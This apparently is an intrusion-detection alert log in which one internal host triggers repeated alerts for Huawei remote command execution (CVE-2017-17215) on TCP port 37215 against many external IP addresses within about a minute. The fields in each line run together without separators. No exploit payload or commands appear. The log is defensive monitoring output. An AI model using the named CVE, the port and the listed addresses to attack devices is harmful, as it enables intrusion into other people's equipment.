                                                        06/13/24-21:32:19.729418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384237215192.168.2.1441.92.218.207
                                                        06/13/24-21:32:28.027438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814437215192.168.2.14197.7.210.123
                                                        06/13/24-21:33:13.211519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184037215192.168.2.14156.172.45.16
                                                        06/13/24-21:32:46.524729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917637215192.168.2.14197.156.96.3
                                                        06/13/24-21:32:15.633189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043837215192.168.2.1441.136.185.163
                                                        06/13/24-21:32:23.835512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931437215192.168.2.1441.217.13.122
                                                        06/13/24-21:32:11.506728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178837215192.168.2.14197.241.161.32
                                                        06/13/24-21:32:44.476297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498237215192.168.2.14156.202.20.229
                                                        06/13/24-21:33:09.086247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5055637215192.168.2.14197.112.142.96
                                                        06/13/24-21:32:23.932230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358037215192.168.2.14197.13.149.243
                                                        06/13/24-21:32:34.192872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250037215192.168.2.14156.162.73.141
                                                        06/13/24-21:32:21.803811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5888837215192.168.2.14197.234.42.210
                                                        06/13/24-21:32:52.676198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540637215192.168.2.14197.83.78.40
                                                        06/13/24-21:32:25.974060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328837215192.168.2.14156.250.27.214
                                                        06/13/24-21:31:59.177398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714437215192.168.2.1441.210.189.234
                                                        06/13/24-21:32:19.728389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569237215192.168.2.14156.155.44.26
                                                        06/13/24-21:32:23.835374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442637215192.168.2.1441.122.15.113
                                                        06/13/24-21:32:21.801205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284037215192.168.2.14156.59.221.230
                                                        06/13/24-21:32:28.028404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845637215192.168.2.14197.86.36.98
                                                        06/13/24-21:32:17.674912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352237215192.168.2.1441.127.111.145
                                                        06/13/24-21:32:44.476058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979037215192.168.2.14156.71.230.141
                                                        06/13/24-21:32:52.671147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817437215192.168.2.1441.76.31.58
                                                        06/13/24-21:32:11.484452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437637215192.168.2.14197.224.208.178
                                                        06/13/24-21:32:40.372158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683037215192.168.2.14156.109.30.110
                                                        06/13/24-21:33:11.176589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461037215192.168.2.1441.168.69.31
                                                        06/13/24-21:32:09.440722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734037215192.168.2.14197.49.121.47
                                                        06/13/24-21:32:40.372349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838637215192.168.2.14156.247.82.136
                                                        06/13/24-21:33:13.211318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294037215192.168.2.14197.190.163.165
                                                        06/13/24-21:32:23.933522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5548637215192.168.2.14156.171.149.44
                                                        06/13/24-21:32:30.096196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598237215192.168.2.14197.229.235.115
                                                        06/13/24-21:33:07.040936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032237215192.168.2.1441.240.127.247
                                                        06/13/24-21:32:15.611448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153237215192.168.2.1441.99.220.93
                                                        06/13/24-21:33:11.180479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877237215192.168.2.1441.33.247.231
                                                        06/13/24-21:33:17.304884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897637215192.168.2.14197.123.63.167
                                                        06/13/24-21:32:58.821453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742837215192.168.2.14156.163.170.114
                                                        06/13/24-21:32:54.707435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730837215192.168.2.1441.224.86.8
                                                        06/13/24-21:32:11.485522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801237215192.168.2.1441.156.212.214
                                                        06/13/24-21:32:07.401904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711237215192.168.2.1441.237.16.225
                                                        06/13/24-21:32:15.605755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579637215192.168.2.1441.36.137.165
                                                        06/13/24-21:32:40.359212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893437215192.168.2.1441.163.56.116
                                                        06/13/24-21:32:17.694481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444637215192.168.2.14197.203.172.88
                                                        06/13/24-21:32:30.124694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783837215192.168.2.14197.20.31.125
                                                        06/13/24-21:32:44.453861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574237215192.168.2.14197.180.159.45
                                                        06/13/24-21:32:17.696893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492837215192.168.2.14197.233.195.202
                                                        06/13/24-21:32:11.488635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599637215192.168.2.14197.75.201.51
                                                        06/13/24-21:32:25.968257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5782637215192.168.2.14156.177.76.212
                                                        06/13/24-21:33:11.181809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042437215192.168.2.14197.179.145.7
                                                        06/13/24-21:32:28.048811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304237215192.168.2.1441.5.80.66
                                                        06/13/24-21:32:21.800360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104237215192.168.2.14197.221.200.48
                                                        06/13/24-21:32:40.358226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827237215192.168.2.14156.35.169.75
                                                        06/13/24-21:32:50.612368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968637215192.168.2.14156.189.95.115
                                                        06/13/24-21:32:58.839595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272437215192.168.2.14197.29.120.22
                                                        06/13/24-21:32:48.570266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092037215192.168.2.1441.230.211.89
                                                        06/13/24-21:33:17.307755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435637215192.168.2.1441.7.237.42
                                                        06/13/24-21:33:09.110446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5632437215192.168.2.14197.54.235.92
                                                        06/13/24-21:32:19.730718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198437215192.168.2.1441.239.27.52
                                                        06/13/24-21:32:05.348865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028837215192.168.2.1441.77.182.65
                                                        06/13/24-21:32:50.631340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717437215192.168.2.14156.91.160.8
                                                        06/13/24-21:32:23.833441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207037215192.168.2.1441.109.163.80
                                                        06/13/24-21:32:54.726931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923237215192.168.2.1441.114.164.57
                                                        06/13/24-21:32:17.696253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550237215192.168.2.14156.17.247.218
                                                        06/13/24-21:32:38.302009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181437215192.168.2.1441.98.24.247
                                                        06/13/24-21:33:09.089764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945237215192.168.2.14197.129.3.25
                                                        06/13/24-21:32:42.407345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682237215192.168.2.1441.46.97.184
                                                        06/13/24-21:32:44.458099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090837215192.168.2.1441.57.185.26
                                                        06/13/24-21:32:48.552588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253237215192.168.2.1441.229.100.232
                                                        06/13/24-21:32:56.758716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372437215192.168.2.14197.93.114.139
                                                        06/13/24-21:33:05.014523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759437215192.168.2.14197.77.127.161
                                                        06/13/24-21:32:17.678996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417237215192.168.2.14197.77.114.63
                                                        06/13/24-21:32:48.552762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476237215192.168.2.1441.203.189.139
                                                        06/13/24-21:32:25.996353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272437215192.168.2.14156.36.66.39
                                                        06/13/24-21:33:13.212372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629637215192.168.2.14156.236.0.252
                                                        06/13/24-21:33:05.010152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578237215192.168.2.14156.127.250.213
                                                        06/13/24-21:32:19.753569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660037215192.168.2.14197.29.50.143
                                                        06/13/24-21:32:30.125335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814237215192.168.2.14197.16.85.186
                                                        06/13/24-21:32:54.706931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5641837215192.168.2.14156.119.235.7
                                                        06/13/24-21:32:52.678678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060037215192.168.2.14197.144.63.88
                                                        06/13/24-21:31:57.094027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5762637215192.168.2.1441.145.12.182
                                                        06/13/24-21:32:54.710017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292237215192.168.2.1441.202.180.92
                                                        06/13/24-21:32:38.317106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169037215192.168.2.14156.200.151.243
                                                        06/13/24-21:32:44.452024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602237215192.168.2.1441.45.62.50
                                                        06/13/24-21:32:38.302379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893237215192.168.2.14156.166.185.34
                                                        06/13/24-21:32:54.708826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068237215192.168.2.14156.164.209.155
                                                        06/13/24-21:33:02.954777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541437215192.168.2.14197.186.141.80
                                                        06/13/24-21:32:11.487592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284637215192.168.2.14197.2.207.165
                                                        06/13/24-21:32:44.458353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330637215192.168.2.14197.7.65.69
                                                        06/13/24-21:33:02.908240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5924837215192.168.2.1441.120.219.229
                                                        06/13/24-21:31:59.194693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938037215192.168.2.1441.72.198.137
                                                        06/13/24-21:32:38.301877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931237215192.168.2.14156.3.123.157
                                                        06/13/24-21:32:13.566675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028437215192.168.2.14156.205.150.104
                                                        06/13/24-21:32:50.610712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729237215192.168.2.14156.157.38.120
                                                        06/13/24-21:32:38.322893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5807637215192.168.2.1441.131.137.21
                                                        06/13/24-21:33:17.308960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799837215192.168.2.1441.230.196.237
                                                        06/13/24-21:32:28.024086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623037215192.168.2.14156.133.47.35
                                                        06/13/24-21:32:46.502966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793637215192.168.2.1441.246.32.134
                                                        06/13/24-21:32:58.822890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257237215192.168.2.14156.79.221.24
                                                        06/13/24-21:32:56.786304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641037215192.168.2.14197.119.251.128
                                                        06/13/24-21:33:04.992127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898837215192.168.2.14197.155.66.13
                                                        06/13/24-21:33:17.304818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789037215192.168.2.14156.242.143.158
                                                        06/13/24-21:32:15.611516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680237215192.168.2.1441.224.35.217
                                                        06/13/24-21:33:02.914378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5608637215192.168.2.1441.0.247.9
                                                        06/13/24-21:32:09.438285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440837215192.168.2.14197.129.97.128
                                                        06/13/24-21:32:54.726843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077637215192.168.2.14156.85.45.5
                                                        06/13/24-21:32:46.508672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559637215192.168.2.14156.17.103.187
                                                        06/13/24-21:32:30.095924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113037215192.168.2.1441.157.162.253
                                                        06/13/24-21:32:32.151723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345037215192.168.2.14156.186.72.67
                                                        06/13/24-21:31:59.176733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523637215192.168.2.14156.64.133.141
                                                        06/13/24-21:33:15.273221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798837215192.168.2.1441.59.34.128
                                                        06/13/24-21:32:11.484534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681837215192.168.2.1441.98.8.247
                                                        06/13/24-21:32:13.545722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006437215192.168.2.1441.228.2.245
                                                        06/13/24-21:31:57.137112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620237215192.168.2.14156.143.209.83
                                                        06/13/24-21:31:57.092941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419437215192.168.2.1441.127.210.27
                                                        06/13/24-21:33:02.909738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336837215192.168.2.1441.125.92.178
                                                        06/13/24-21:32:42.404932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4808437215192.168.2.1441.32.5.222
                                                        06/13/24-21:32:05.349021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880837215192.168.2.14197.192.58.164
                                                        06/13/24-21:32:11.508043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4818237215192.168.2.1441.14.6.218
                                                        06/13/24-21:32:40.379815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123237215192.168.2.14197.205.181.62
                                                        06/13/24-21:32:44.453106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056237215192.168.2.1441.163.6.100
                                                        06/13/24-21:32:17.672199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3589437215192.168.2.1441.184.169.224
                                                        06/13/24-21:33:15.252238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802837215192.168.2.1441.72.49.19
                                                        06/13/24-21:31:57.153156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711437215192.168.2.14156.233.113.8
                                                        06/13/24-21:32:56.757697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074637215192.168.2.1441.65.89.157
                                                        06/13/24-21:32:36.242462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410837215192.168.2.14197.136.10.26
                                                        06/13/24-21:32:52.678627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361237215192.168.2.14156.117.216.47
                                                        06/13/24-21:33:07.057823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869237215192.168.2.14156.120.66.4
                                                        06/13/24-21:33:00.885081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4220037215192.168.2.14197.241.168.192
                                                        06/13/24-21:32:48.554063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136637215192.168.2.1441.117.3.231
                                                        06/13/24-21:33:07.042388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819637215192.168.2.14197.81.93.112
                                                        06/13/24-21:32:07.417201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883637215192.168.2.14156.62.4.156
                                                        06/13/24-21:32:32.168777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151637215192.168.2.14156.234.1.191
                                                        06/13/24-21:32:52.678020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501637215192.168.2.14197.229.253.104
                                                        06/13/24-21:32:32.166086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441037215192.168.2.1441.159.120.145
                                                        06/13/24-21:32:42.424382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086037215192.168.2.14197.230.59.19
                                                        06/13/24-21:32:48.553289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595237215192.168.2.1441.171.97.196
                                                        06/13/24-21:33:17.305142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071437215192.168.2.14156.45.197.81
                                                        06/13/24-21:32:01.219607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062837215192.168.2.1441.216.57.211
                                                        06/13/24-21:32:23.836499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984437215192.168.2.1441.5.22.175
                                                        06/13/24-21:33:00.871878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824437215192.168.2.14197.121.233.42
                                                        06/13/24-21:31:57.130401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257037215192.168.2.14197.177.48.18
                                                        06/13/24-21:33:11.158249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103837215192.168.2.1441.225.17.244
                                                        06/13/24-21:32:46.503312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571437215192.168.2.14197.190.72.234
                                                        06/13/24-21:32:09.438463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450637215192.168.2.1441.229.63.146
                                                        06/13/24-21:32:17.694615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050637215192.168.2.14197.14.24.242
                                                        06/13/24-21:32:50.613802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567237215192.168.2.1441.88.230.160
                                                        06/13/24-21:31:57.131026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882437215192.168.2.14156.236.192.16
                                                        06/13/24-21:33:09.101632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703037215192.168.2.1441.241.239.83
                                                        06/13/24-21:32:15.629376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956037215192.168.2.1441.48.237.65
                                                        06/13/24-21:32:32.166626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613437215192.168.2.14197.142.65.235
                                                        06/13/24-21:32:40.356166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401637215192.168.2.1441.222.100.221
                                                        06/13/24-21:32:50.629754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450637215192.168.2.14197.72.188.108
                                                        06/13/24-21:33:09.109138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434637215192.168.2.14156.1.161.58
                                                        06/13/24-21:32:25.974332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013237215192.168.2.14156.237.157.197
                                                        06/13/24-21:32:05.343541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017837215192.168.2.14197.163.203.250
                                                        06/13/24-21:32:01.241735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147637215192.168.2.1441.210.222.247
                                                        06/13/24-21:33:04.989451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312237215192.168.2.14197.255.197.133
                                                        06/13/24-21:33:09.128179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908037215192.168.2.14156.29.206.16
                                                        06/13/24-21:33:15.258729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767037215192.168.2.14197.37.46.183
                                                        06/13/24-21:32:52.657121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932037215192.168.2.14156.26.133.45
                                                        06/13/24-21:32:28.024477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842837215192.168.2.1441.162.174.143
                                                        06/13/24-21:33:09.129128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163837215192.168.2.14197.132.161.40
                                                        06/13/24-21:32:09.458477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465837215192.168.2.14197.93.105.232
                                                        06/13/24-21:32:30.126341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259437215192.168.2.1441.56.105.160
                                                        06/13/24-21:33:00.871786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174037215192.168.2.1441.227.104.11
                                                        06/13/24-21:32:40.373957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4326837215192.168.2.1441.37.122.23
                                                        06/13/24-21:32:28.024422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674437215192.168.2.14156.112.47.78
                                                        06/13/24-21:32:50.631380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3770637215192.168.2.1441.29.1.73
                                                        06/13/24-21:32:30.127314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746837215192.168.2.1441.230.79.156
                                                        06/13/24-21:32:32.150745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488637215192.168.2.14156.47.179.68
                                                        06/13/24-21:32:13.544714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024637215192.168.2.14156.20.128.149
                                                        06/13/24-21:33:09.090062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819437215192.168.2.14197.193.138.181
                                                        06/13/24-21:33:13.229135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542037215192.168.2.14197.73.221.232
                                                        06/13/24-21:33:02.912888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097437215192.168.2.14197.8.238.80
                                                        06/13/24-21:33:04.991553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391437215192.168.2.14197.48.165.36
                                                        06/13/24-21:32:44.453153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289837215192.168.2.14156.175.242.187
                                                        06/13/24-21:33:05.016757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856237215192.168.2.14197.67.229.20
                                                        06/13/24-21:33:15.255960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899237215192.168.2.14197.183.166.41
                                                        06/13/24-21:32:07.417923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797237215192.168.2.14156.17.46.171
                                                        06/13/24-21:32:36.244247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778837215192.168.2.14197.190.13.57
                                                        06/13/24-21:32:46.528369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903437215192.168.2.14156.190.6.5
                                                        06/13/24-21:32:36.246668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358837215192.168.2.14156.69.248.248
                                                        06/13/24-21:31:57.091729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377237215192.168.2.14197.219.160.109
                                                        06/13/24-21:32:42.421006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4767637215192.168.2.14156.97.251.252
                                                        06/13/24-21:32:50.630060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572437215192.168.2.14197.68.164.152
                                                        06/13/24-21:33:17.309441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203437215192.168.2.14197.149.43.83
                                                        06/13/24-21:32:21.801073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4136437215192.168.2.1441.60.48.38
                                                        06/13/24-21:32:36.245799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210637215192.168.2.1441.211.211.41
